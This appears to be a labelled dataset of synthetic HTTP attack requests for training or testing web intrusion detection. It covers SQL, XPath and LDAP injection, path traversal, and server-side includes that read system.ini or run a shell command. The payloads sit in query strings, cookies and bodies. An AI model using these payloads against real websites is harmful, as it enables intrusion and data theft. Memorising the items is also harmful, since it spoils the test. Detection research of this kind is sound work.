GET /lEa2kGKE_g@u/r2a/ep/D5mme/nR/oe3B@af1Q9pfk@TiXSx/0bw8M3ZYXWkSVZS/-UtmpTrrH/a2f/wWI/hVcA/2hehsswahrp.htm?jgj66dpl=tiXvT&sI-ig-Wf=gvcn&ne7f=ctzded%27+++or+++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28i++%2B++j++%2B+k+%2Bl%2B+1%29%5D++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or++++%27eb%27++++%3D+%27++++loaI1d%27++++or HTTP/1.0
Host: 242.140.200.6
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: l-uihdb1z, nw5-A8a;q=0.2, a-tdn;q=0.9, 9m-e;q=0.9, oaweyge-ei;q=0.0
Cache-Control: no-cache
Client-ip: 111.27.1.64
Cookie: 4ZaaQ=33577516;uellh=Ie~
Cookie2: $Version="55"
Date: Sat, 23 Aug 08 12:12:38 UTC
ETag: W/"G32zz.S_bM61Knda"
Expect: 37tora
From: eseIouno@dgr3a.gov
If-Modified-Since: Fri, 18 Feb 05 06:02:57 GMT
If-Unmodified-Since: Sun, 08 Jan 06 10:17:12 UTC
If-Match: *
If-None-Match: *
If-Range: "SxD.GKZF1KXk6prSn"
Max-Forwards: 1864
MIME-Version: 7.5
Pragma: io3mm3dt='Urr'
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest opaque="rt7ngt"
Referer: http://www.adLiEelo.gov/fedx8y/egfa/ed7Ecl/wqstkSi.gif
TE: trailers,trailers
Trailer: Expect
User-Agent: t5eZ1sT9Gd http://www.0ddsw.be
UA-OS: WinNT
UA-Pixels: 4135x5853
Via: FTP/1.3 www.S7naeu.png:2, FTP/8.2 159.184.117.105, 9.1 151.124.209.250
Transfer-Encoding: deflate
Upgrade: n2smtz/0.7
Warning: 463 52.135.104.34 "le3vso" 
X-Forwarded-For: 240.46.36.222
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35799
Start - Id: 44778
class: PathTransversal
GET /es7isbixomoceaatftC/cnm-DW@lx30RF/@2xr/2e1sagleer/Svfbetween/ulrr2saratB4ytpOgc/mznfecestctd/sdkisap/nbvvd9gFwGl9PDA09/ezTln/dBBFHPptq7/se7WZFVU.jpeg?2LW3XU2mail.H=tifpn9wp-&6nVF=%3Eblansxp_r&2nwn8mh=0999&i5creheoegheet=collection%28file%3A%2F%2F%2Fc%3A%2Fena%2Fbhbgcelu.xml%29&l1=9&gtu3eencdAsro=7r&alle=ehxytl&t7oacsl=800 HTTP/1.0
Host: www.2Ek3es.be:72068
Connection: raeto
Accept: image/png, application/*;q=0.6, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: 6c=4pcs
Client-ip: 7.176.110.139
Cookie: nmc==E7;ntid2zdn7ds=nqienw2fPetd7abhw;lnltpenhW1rho=ehihehncld
Cookie2: $Version="8"
Date: Fri, 15 Aug 08 22:42:12 CET
ETag: W/"1moiL3zP1yW7wCq50"
Expect: 100-continue
From: iddCt@3ahi.gov
If-Modified-Since: Wed, 27 Dec 06 21:57:59 CET
If-Unmodified-Since: Sat, 09 Apr 05 10:30:57 GMT
If-Match: *
If-None-Match: *
If-Range: "kkjXyaYb9_QMuAyd@wAE"
Max-Forwards: 1
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM TkFybzU4RWZiZXJwczBoZXJnc2Z0ZXdibDV5eDhydGJkbGlzcHM=
Range: 6578-336232,-258470,45228-5909
Referer: http://www.o5e6tdfm.uk/it4tn3f/em4s9ttn.sh
TE: trailers,deflate
Trailer: Warning
User-Agent: Mozilla/9.9 (Machintosh; U; Mac OS X 4.7; Rf-j6; rv:0.7.8) Gecko/42129703
UA-CPU: MIPS
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 822x152
Via: tles/3.0 www.m5eaao.tiff:5
Transfer-Encoding: compress
Upgrade: xdn/6.9, zath/4.3, enftae/3.8, tsot/2.4
Warning: 651 www.ohli.jpeg "ze4iSksESreE" 
X-Forwarded-For: 39.131.202.145
X-Serial-Number: 2157159271334
----: -----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 44778
Start - Id: 48936
class: XPathInjection
GET /DT/ilvX/5PVD/stada6t9/sihRoBA7CpR_H4SYzvMk/bk0C7X0blx/tb/ltUeyThr-LZiC.png?siIiafck=e&ndxhwoamn=246&etY8getLotHdba=2&ilneyuoenw=8613021&hNdfeersson8qo1=eye&oE0iond=9n+at&c84yA=2066&metxhwe=sukd&ehdylEaoY6=aa%27+++++or++++6+%3C+++count%28path%2Fchild%3A%3A*%29+or+++++%27vglrwyZa%27+++%3D+++%27 HTTP/1.1
Host: 121.225.97.218:960
Connection: close
Accept: application/x-tar, application/x-tar
Accept-Charset: x-mac-roman;q=0.6
Accept-Encoding: deflate;q=0.2, deflate
Accept-Language: s2dt-o0rdwn, otldis3-reg6;q=0.7, elltn2h-lwt;q=0.7, yIea6ym-3gynosro;q=0.0
Cache-Control: only-if-cached
Client-ip: 163.68.137.81
Cookie: umallahd=ycY;oltdp11li8c=ai6;eocIeut1osp6alr=76553
Cookie2: $Version="549"
Date: Wed, 09 Jun 04 10:00:50 UTC
ETag: "TWWprd7QW14Uza11Ny2"
Expect: 100-continue
From: 11ria@soa2e.be
If-Modified-Since: Thu, 28 Sep 06 21:24:17 UTC
If-Unmodified-Since: Fri, 17 Nov 06 16:47:38 CET
If-Match: "O7Sn0543aQHWUI_e9Dv"
If-None-Match: *
If-Range: Fri, 12 Dec 08 08:38:24 UTC
Max-Forwards: 340
MIME-Version: 6.7
Pragma: d='todogc'
Proxy-Authorization: Digest response="bDD9738c8b7dB2ba67BAcc1DF2f5adcE"
Authorization: Basic ZGJiZmhlYVQ6b29lYw==
Range: 326-470558,-0121
Referer: /dpnaHdsm.ace
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.5 (Windows; U; Win98 9.8; zs-lr; rv:3.7.7) Gecko/94097177
UA-CPU: 68000
UA-Disp: 3657,5420,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 508x349
Via: FTP/0.4 www.aycmt5e.js
Transfer-Encoding: compress
Upgrade: tgxf/7.7, hudO/8.7, kEn/1.6, souT/0.8
Warning: 800 139.238.82.6 "oepmrjghlc" 
X-Forwarded-For: 148.116.229.67
X-Serial-Number: 6293000915488
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48936
Start - Id: 38155
class: LdapInjection
GET /9ZBn-execbv8N_-/yuniona3AOUbin8Pa/tp7OLpX4xMPSGlI/lQ@@LAL5MFdiPDX/fE27xMvBg.-apZciCe/JuzE4-3h84NjZe/aobSSHZ/vwyBh5wD8gklnl/G.vqgjDWD5wget6GZ/urtoCbghl7uo/eBt/3bZyYpcGfBdvqGr4ea.php?5ICfauzo=suinEssqu&rp=6523225215&1adYm=mh7soroeittm&ek2nureds=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: www.cphl.org
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: ibta-Tt8bI;q=0.9, tnonnhd-erospe, p-qi9;q=0.0, seidm1e-9ihchW;q=0.2
Cache-Control: no-store
Client-ip: 106.203.232.28
Cookie: ceds=nzCoq;oh5irdt35ln5um=trst;7aser2=ee%u7a;zoTxzdmedpEr=7976849487;fkioa1acqsk2toS=c<croimeTh
Cookie2: $Version="2"
Date: Tue, 18 Nov 08 06:44:51 UTC
ETag: "A1s@88r@tyXJ610"
Expect: 100-continue
From: 7enqeIo@sjtoi.net
If-Modified-Since: Fri, 12 Aug 05 18:12:43 UTC
If-Unmodified-Since: Wed, 19 Nov 08 02:06:07 UTC
If-Match: *
If-None-Match: *
If-Range: "_SLZ.-3l2kkJnkC"
Max-Forwards: 4856
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: vanc 8esln=eenorc9
Authorization: njtdo oiaHAsOe=InaIstei
Range: 215419-,-798,087561-
Referer: /kiia7Aao/ihTnae6b/5e7ce/Ta1xe6he.pl
TE: gzip,gzip;q=0.4
Trailer: Proxy-Authorization
User-Agent: eugen/9.0.0
UA-CPU: StrongARM
UA-Disp: 651,9493,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9560x3335
Via: HTTP/8.7 98.87.75.240
Transfer-Encoding: identity
Upgrade: eeu/8.8, fSe7/3.7, nho/6.1, rqw/6.3, SLsti/8.0
Warning: 967 www.teLieti.js "bUr2" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38155
Start - Id: 40649
class: SSI
GET /4E.eoVc/eF/iei3etsbiTddt/clfls/spDZ2KUbzNCU/nOFs9sTcyO-pzKnIJu/ez_fONh6jLSc/ozabdansrrteM/2r0oe2cbAr2osin0/dc98mth/gByZri.aspx?txoddxg=39407626&ocr6HsCc=lt%2Fa&ozHyZUFWzbh=trioitlWvetrorri&yIje4zi=thdtmotet+f&2tator=+&rEcqnn1ttt6emxy=qoreds1caaF4j3&deest4iaheiu5=yHLt&hofiheieb=%3C%21--++++%23include++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+--%3E HTTP/1.1
Host: www.rRsdE.com:02853
Connection: tWutb
Accept: video/quicktime, text/xml
Accept-Charset: macintosh;q=0.5, iso-2022-kr, koi8, euc-cn, windows-874
Accept-Encoding: deflate;q=0.8, deflate;q=0.4, compress
Accept-Language: D29r-eha, gdestT-thi, ccomds-narnenj
Cache-Control: oc5='c'
Client-ip: 26.207.222.161
Cookie: 0Reeynt=sa\;nalmm=65082
Cookie2: $Version="2"
Date: Thu, 05 May 05 09:40:23 UTC
ETag: "lBtTht_ysib8rxO9l@2"
Expect: 100-continue
From: OhLEoh@pga5e.org
If-Modified-Since: Tue, 09 Oct 07 08:00:02 CET
If-Unmodified-Since: Mon, 05 Sep 05 18:41:38 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 84
MIME-Version: 0.6
Pragma: bome=mwge
Proxy-Authorization: sfoht tsob=EeAAttxn
Authorization: Digest response="fdaeB2aB63B24BdE60C3ec0D3A31FBBc"
Range: 176-,5948-8668,8671-305
Referer: http://www.orei3ge.com/4s6t98e/EeYvzt/DweteeN.pdf
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/6.9 (Machintosh; U; PPC Mac OS X 3.4; 4a-gG; rv:7.7.4) Gecko/88759422
UA-CPU: PowerPC
UA-Disp: 959,926,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 951x487
Via: FTP/0.9 www.dfite.htm
Transfer-Encoding: gzip
Upgrade: eeyr/9.4
Warning: 643 www.anntntto.js "msA0earuygs" 
X-Forwarded-For: 197.32.78.234
X-Serial-Number: 552421
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40649
Start - Id: 45041
class: PathTransversal
POST /sophatia/e1Jdv5S1/Ccopycm/eRRiframeUyldeleteW.pC_HH/af1Musc@GwnM/vO1/3ac_t/doy.0cfbFj7RNboLHaU/XoWhEzAMKO55Ch/sssrf/oyaX4hHqXin_f/amedm9rl.asp? HTTP/1.1
Content-Length: 37
Content-Language: Rtme
Content-Encoding: compress
Content-Location: http://www.ilu0n0.be/zhhaS/ts0stel7/xntdyn.mspx
Content-MD5: U3R4YTVsNWw2ZTVkYTZsdA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 24 Apr 10 05:18:06 CET
Host: 249.224.254.199
Connection: djllndae
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: e6oe-n;q=0.8, gxIcnaub-rt, sceeh-1gn, sssTiie-X8hti8a;q=0.6, eltorhsa-mU3;q=0.2
Cache-Control: min-fresh=530
Client-ip: 238.101.124.215
Cookie: snspaovs=0228;0d3ptbdaps9NiwA=../../../usr/dsqqdsqsd.xml;0te0vu=4l
Date: Sun, 18 Dec 05 10:40:51 CET
ETag: "r8zsuIw0CdBQoXI"
From: Tlxrhi@jeci.be
If-Unmodified-Since: Thu, 13 Jan 05 04:37:42 UTC
If-Match: "7BxNrDdA9guSr@5-uTXB"
If-None-Match: *
If-Range: "oSWfced@nC3_.aQfac"
Max-Forwards: 703
MIME-Version: 4.7
Pragma: y='anEHxoIe'
Proxy-Authorization: Basic ZWloSDpwUnR0NzlqaA==
Referer: /wnei3e/OaiU/dqprde/hsfaoof6.cgi
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.6 (Machintosh; U; PPC 1.7; ma-rh; rv:8.3.2) Gecko/57119098
Via: icon/3.9 22.233.234.218, 0.8 76.212.150.143, bmnSze/0.3 www.etejwx.gif
Upgrade: ajihd/8.9, 7ab/7.8, macfid/7.6, adtsun/4.8, cUus/9.3
Warning: 919 www.saro.html "wmAx9tns3g2" 

eodm=CU]l echonetcatetcddPyene\sm

End - Id: 45041
Start - Id: 42058
class: SqlInjection
GET /w00pXIhwrc2mEz@u/nuoCQnS.KjSCr1L2aH/uIN/tItiwSkiAT1nfteaen/hN27ebvlmdrweNor0s6c/odol2at0rhenagkPho/tA.tiff?KdropUE2E%uuzn=%27+++++OR++%27CiO%27++LIKE++++%27aze%2525&raa97sS5sich=aecnto&window.openP%ui_tbJnph-3n.=iQzYWd&2r=ehswekaeUooja3&yeYsdrdhmhrnio=hlaoAbaiDta&GhkBDBkSi=yad8 HTTP/1.1
Host: www.oiuswr.fr:37
Connection: close
Accept: */*
Accept-Charset: shift_jis;q=0.5, windows-1251;q=0.3, koi8
Accept-Encoding: compress, deflate;q=0.9, deflate;q=0.8, compress
Accept-Language: *
Cache-Control: max-age=1
Client-ip: 240.50.140.120
Cookie: 8IRoptAcZq=%apc
Cookie2: $Version="46"
Date: Fri, 15 Jul 05 22:00:43 GMT
ETag: W/"0OzoIBhLz0TEHDP7"
Expect: 100-continue
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Fri, 05 Jan 07 07:27:18 GMT
If-Unmodified-Since: Wed, 11 Feb 04 05:40:43 UTC
If-Match: *
If-None-Match: *
If-Range: "w5RYOz85gXktcR8g"
Max-Forwards: 421
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic Y3N0dGR0YTpwZUV0
Authorization: Basic aWN5NXA6VWVFaG50aHI=
Range: -99729
Referer: /ottcm0/d7le/a3won.css
TE: deflate,trailers,trailers
Trailer: Range
User-Agent: Mozilla/6.9 (Machintosh; U; Mac OS X 9.2; tw-hi; rv:4.7.2) Gecko/78841879
UA-CPU: MIPS
UA-Disp: 7502,392,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 927x5675
Via: 9.8 150.228.124.21:5337, HTTP/1.6 www.emooteM.png
Transfer-Encoding: tut2ei; aehnijo=uir4h
Upgrade: Ens/2.7, ieoa/3.9, 4tt/2.8, ind/4.0, sute/1.0
Warning: 264 99.10.30.250 "a0gtsj1ecytcw5Eqrc" 
X-Forwarded-For: 206.224.167.230
X-Serial-Number: 001394948859071824
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42058
Start - Id: 49068
class: XPathInjection
GET /e8oq/o_Ht1.SPQq2h/0Oe/soCtkskcl7ze/t7BWv1aMut3S6Vm/te.php3?us0orknnr0ht1=71&qIbinhaving=%28i+++%3C++++count%28sro%2Fchild%3A%3Atext%28%29%29+and++++j+%3C+++count%28ije%2Fchild%3A%3Acomment%28%29%29++++and+++k+++%3C+count%28hge%2Fchild%3A%3A*%29++%29&nfnnwXhanog=xsEnmeopen7rlTlaoas HTTP/1.0
Host: 211.222.19.78
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-cyrillic;q=0.3, x-mac-ce;q=0.1, x-mac-turkish
Accept-Encoding: *
Accept-Language: ha-k, pl1e-rataaf;q=0.2, yr-o;q=0.5, bqEnetyu-d9pamfe;q=0.5
Cache-Control: no-store
Client-ip: 164.173.183.167
Cookie: 6ynto3d4=W l-eN;g8NaG_fFWand0@=nrudnoon;dYPKU=%e'%=roteia t gqniwp-;awnno=258584
Cookie2: $Version="920"
Date: Fri, 07 Apr 06 08:33:02 CET
ETag: "91bonU_8hX5Lp8pQC"
Expect: 100-continue
From: oT4sie@pMej.gov
If-Modified-Since: Wed, 25 Feb 04 10:49:38 CET
If-Unmodified-Since: Thu, 04 Jan 07 22:30:31 UTC
If-Match: "sStgjOQPpH2mAv."
If-None-Match: *
If-Range: "8WcuBMDm2pIipGgVD"
Max-Forwards: 6
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM Y3FhZWFobWFmYW5BaGRlZHRlb3Jhc2xhZTluR2xEdmxkVWNuaEl0ZW92cw==
Authorization: NTLM U2VoMXRydHllZ3J5OHNvbG0wdGlzdGFxamJrb2lvZXNnM2Rzb0Yy
Range: 115-9
Referer: http://dyin.org/escr/7nha/ctiu/qgtofi8c.txt
TE: trailers,trailers,gzip
Trailer: Date
User-Agent: Mozilla/4.8 (Machintosh; U; PPC 0.9; 4o-nr; rv:2.8.3) Gecko/98462967
UA-CPU: x86
UA-Disp: 470,303,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7313x7197
Via: FTP/8.8 www.iuates.htm, HTTP/9.3 243.159.36.87:4755
Transfer-Encoding: 46Gbd
Upgrade: ne0d/6.8, b5on/7.9, gcX8/0.6, bci/5.8, ibw/8.8
Warning: 069 www.eoApA.tiff "paahksminehn7lr6TE" "Wed, 28 Oct 09 15:16:56 CET"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 509527
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49068
Start - Id: 42765
class: SqlInjection
PUT /cn/Licg/KpasswdbctE.IFk/U.K/e1nfo1smdnM/svK0LBRR6EdEhaoAVk7/so/nnxneseizthowbizet/KenU7Y/auaf.css? HTTP/1.0
Content-Length: 232
Content-Language: nas0am,abewoi
Content-Encoding: compress
Content-Location: http://saunsa.fr/csfi/hlrqBIa.html
Content-MD5: dG5xbGNkaHJ0YUxlb2kyaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 15 Aug 07 14:50:27 UTC
Last-Modified: Sun, 21 Feb 10 03:21:49 GMT
Host: 75.18.142.227
Connection: odryA
Accept: text/html, video/*
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: *
Cache-Control: no-cache
Client-ip: 246.238.255.192
Cookie: GsagnT='select customer_phone   '||'from customers     '||'where     customer_surname='''||     lv_surname||'''  and   customer_type=1';;it02iRerodnw=218986;ud=54323
Cookie2: $Version="54"
Date: Wed, 01 Jun 05 13:42:29 GMT
ETag: W/"4syG_ceHAAG5p1m.jr"
Expect: 100-continue
From: 5oaPot@qass3ou.be
If-Modified-Since: Sat, 27 Jan 07 22:25:35 CET
If-Unmodified-Since: Wed, 12 Jul 06 20:10:13 GMT
If-Match: "hBWJ@@TsiU3M_-vCDERB"
If-None-Match: *
If-Range: Wed, 07 May 08 04:07:20 CET
Max-Forwards: 276
Pragma: no-cache
Proxy-Authorization: NTLM Zm53VGx6cmFnbmlobXN0c3Rlb2lod2VBb3RhZWFDYXRuaG1vb3BpYzJ0
Authorization: NTLM bnVheG9pdHJ6OVNuZGhmZWhkaW5uYXRrbXRkaHMwcm5wd1Nibw==
Referer: /1iy6d.gif
TE: trailers,trailers
User-Agent: Mozilla/9.0 (Machintosh; U; Mac OS X 7.9; aJ-0h; rv:1.7.2) Gecko/81641927
UA-Disp: 110,8354,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 648x107
Via: HTTP/9.0 www.wreecil.js, HTTP/2.2 25.99.162.157, 3.4 248.34.171.73
Transfer-Encoding: identity
Upgrade: Hic/2.5, elet/9.7
Warning: 191 www.mbisc.gif "soxseOi" 
----: ----------------------------------------

qptiool=5hbetweeniuorascriptdeleteo&cvatsnClt8sC=448811860&seeeskndturtm7=00896767&en=2h&Rhedoam=%25&ry@Dg8vWDU=50375&omon0rb=726551&5ugeuBa=1275232&f0ajSlltaTa4=9992&c3Zovtnstnyntd=w&NjsK%uCIwinntiLb=%28wDwindow.open%2Fed-2%5Cdacj9

End - Id: 42765
Start - Id: 39413
class: SSI
GET /tpne2eyPfsHeelgdn/oOau4tna/NeahoczirhL7l/e.2MKfldbX/ozwUoKs/eHowtgct/cnEQRp11Ix/edkmBMrt7dWUVWb93/ihd7gI/lxRwfZ_dHJxOWPn.sh?mtaMyerd1ayd=tshXmtPxM&nEelp=ideiaeai&aNvimela=%3C%21--%23email+fromhost%3D%22www.hbrdon8.com%22+tohost%3D%22mailbox.cstd.com%22+message%3D%22ener+nrtwmn+mgence+rom%22+fromaddress%3D%22Poso.com%22+toaddress%3D%22hith.gta.com%22+subject%3D%22iam%22+sender%3D%227ts.com%22+replyto%3D%22uqtmr.com%22+cc%3D%22n7hq%22+inreplyto%3D%22macoa+hnt+oa%22+id%3D%22h4drmail%22+--%3E HTTP/1.1
Host: 94.251.98.255
Connection: keep-alive
Accept: application/postscript
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale=71
Client-ip: 123.202.136.228
Cookie: eqdehisgofsmhn=6059;uttrirtts3aeg=15483110
Cookie2: $Version="9"
Date: Sat, 29 May 04 15:46:20 GMT
ETag: "gFaCTXTMM3uIhv8kx"
Expect: 100-continue
If-Modified-Since: Sun, 10 Feb 08 17:51:02 UTC
If-Unmodified-Since: Sat, 27 Oct 07 16:05:29 UTC
If-Match: *
If-None-Match: "sGRfe6R-RBCty.SHb"
If-Range: Tue, 06 Apr 10 04:58:08 UTC
Max-Forwards: 3
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM TnN0dGVxMXJlaHFlYWFwYXdNUmxydGptb2F0dHRzYXN5
Authorization: Basic c2kyQjpnb3Zp
Range: 747370-38132,5734-
Referer: http://www.tNsH.biz/TzmeSnd/widynsb.jsp
TE: gzip,trailers
Trailer: Via
User-Agent: 0v68.Bgb_c http://www.cbtw.it
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-Color: color8
UA-Pixels: 4162x972
Via: HTTP/5.4 www.eoyhfsio.gif, 0.8 112.119.63.196, 9.6 www.ei9d.html:16
Transfer-Encoding: gzip
X-Serial-Number: 15636847207020
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39413
Start - Id: 48918
class: XPathInjection
GET /dNm1oc/Pi4nuc99p/pnpqfmOniefgQ/6_T/twn/sWYJMgODpiUnyFWbglC9/a0-7/uA7tfiaec6Vipw/tJ.wfERXOEyK/xhrrouedditfahlt.dll?eAwynubim=rGouqrn%27+++++or+++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or++++%27wxush%27++++%3D+%27 HTTP/1.1
Host: www.op3bsadt.st
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: alnub-feApodev, qq-c3rpmha;q=0.2, i-nx;q=0.5
Cache-Control: min-fresh=6433
Client-ip: 33.184.179.137
Cookie: oslis4er6=elsmailu>Am;ymiol2IhiEei=42;lqOrnuhyln=na;hRwget6t1pAmy=m6OLziFNB;hh2ektuvn4otp0o=@eMEhtoppmo0
Cookie2: $Version="504"
Date: Thu, 19 Aug 04 08:01:17 GMT
ETag: W/"cAe5kf1_9HIkvNMxj_FA"
Expect: 100-continue
From: adatne4h@font.be
If-Modified-Since: Sun, 23 Apr 06 23:54:27 UTC
If-Unmodified-Since: Mon, 17 Nov 08 12:39:03 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2362
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest response="f4fa2C3be9dCA3EBbB36Ea92bAdd9Da1"
Authorization: o8La htoeIatw=iasvcfnh
Range: 87-22
Referer: http://ioyy3.st/nOhoycb8.gif
TE: gzip;q=0.7,trailers,gzip;q=0.4
Trailer: Warning
User-Agent: Mozilla/5.7 (X11; U; Open BSD i386 7.5; te-Rl; rv:0.7.3) Gecko/71529853
UA-CPU: PowerPC
UA-Disp: 527,115,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 508x349
Via: 7.8 www.dsrsom5.js:8, 0.0 www.cEwfnnr.htm, 1.7 229.46.126.177
Transfer-Encoding: identity
Upgrade: u3c/6.0, utaos/8.9, oeEa2/1.5, oda/3.6, aroeit/0.1
Warning: 099 www.eSitghtc.htm "2nttveexd" "Tue, 21 Sep 04 15:34:20 CET"
X-Forwarded-For: 1.220.148.94
X-Serial-Number: 90589069814400492161
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48918
Start - Id: 42191
class: SqlInjection
GET /Aaaryiagutdt9tretgne/1eehst87io1i.tiff?a3du4ratotDehr=0&na4j=scriptr0eo&htve0GdizafhtOh=65067++++or+id%3E4+or+++ls_id%3C516 HTTP/1.1
Host: 67.249.46.166
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.2, gzip;q=0.0, deflate;q=0.8
Accept-Language: *
Cache-Control: no-store
Client-ip: 73.117.225.171
Cookie: phEehlerranoai=oEenkpdee;iteO=nhd3O;dtmeotl=inedCmfrnnhopenT;urD=498764
Cookie2: $Version="31"
Date: Tue, 28 Jun 05 13:54:09 GMT
ETag: W/"mDVvfRc_ydIMiZa"
Expect: irpp0=cI1o9hea;esvtet
From: bnR1@rhaYn.be
If-Modified-Since: Sun, 08 Oct 06 20:52:05 UTC
If-Unmodified-Since: Mon, 21 Jan 08 09:22:38 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5324
MIME-Version: 4.5
Pragma: e0='miaas'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic czRIc293aTpyZWVkN3dzaQ==
Range: -3,97623-
Referer: http://www.rede.uk/8ialhn/tammqe/iMseae.js
TE: chunked;q=0.2,chunked;q=0.2,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.7 (Machintosh; U; Mac OS X 9.6; ni-R6; rv:5.7.7) Gecko/15937187
UA-CPU: StrongARM
UA-Disp: 466,6159,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 124x5537
Via: wh3i86/8.6 84.214.31.249, 6.6 152.243.157.211
Transfer-Encoding: ioCW
Upgrade: ji40ad/7.5, ednwes/8.3, osi/1.7, eor/7.9
Warning: 838 www.hoxvXtnu.htm "NewsildyiOe" 
X-Forwarded-For: 228.122.136.79
X-Serial-Number: 15953082
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42191
Start - Id: 40199
class: SSI
GET /I.az3jwiZYn1L.php4?or=%3C%21+++++%23%3C%21--+%23exec+++++cmd%3D%22id%22--%3E HTTP/1.1
Host: www.nstntrjmt.gov
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-ce, macintosh, utf-7;q=0.6, x-mac-korean;q=0.2, iso-8859-7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 163.131.232.158
Cookie2: $Version="7"
Date: Fri, 03 Nov 06 15:47:47 UTC
ETag: "1wBpnAmz05uYK.V5M51"
If-Match: *
If-None-Match: *
Authorization: NTLM b3FkOGVDY2xjaDllOHR1cnJOaXV0Z2xubnVyajI4ZTVhem0=
Referer: /tgAc/aaEd/end2ouea.bin
User-Agent: Mozilla/4.1 (compatible; Konqueror/4.0; Linux i386; atknyseb6h)
UA-Disp: 9617,113,16
Via: 0.5 111.37.36.166, 0.8 181.21.105.196
Transfer-Encoding: deflate

null

End - Id: 40199
Start - Id: 40539
class: SSI
GET /cmdO-allHboot.iniDZ/t2ijw.OnxdiK5IGd.jpL/oTEQpOvOyNqVsNYhY/reEdwCevaheoreaC/ikXl@SMb2UE03q@/o09AYnvL0/7oLiitertqniESmfhDC7/tBiBc/eIqCIJ/0h/s5oryd/e0FL9y..S5vium1d8.msf?dol=ePr&ztemOunmT5pwcrc=Rmailebsystemocf&asga97ebnmrg=%3C%21--+++++%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++--%3E&oChwcqttebne1=e HTTP/1.1
Host: www.Satdsifekl.com
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic, x-mac-hebrew;q=0.6, x-mac-korean, big5, windows-1254
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 113.181.235.9
Cookie: guun3=cJLacrYCfPpx;pFNSn4@J8=a73a8axbl;eRrulif4=tjx1TJ084Za;i8=biok1at6e9kTd;IteeB=udRoxmlmeE;ald%aniujag
Cookie2: $Version="4"
Date: Sun, 27 Jan 08 08:28:22 UTC
ETag: "X3kgD5J4q3JmZ9IOwmAz"
Expect: 1sirvmcl=R4nloji;dsonoe=nmaoUt
From: phta9t@exney5i.com
If-Modified-Since: Thu, 30 Aug 07 23:15:43 CET
If-Unmodified-Since: Mon, 19 Sep 05 14:08:46 CET
If-Match: "ddBiL5ICfVeojZ0hdr"
If-None-Match: *
If-Range: "-9KpmbvueTT2OmGaqEi"
Max-Forwards: 9
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM OGVMczFpMnRvRWdwYWJwZTZyam5hRXJ0U2xhdW5uSXFjaFRPYWU4bzU=
Authorization: Basic ZWVudWJzZW06c2VmbnI=
Range: -607
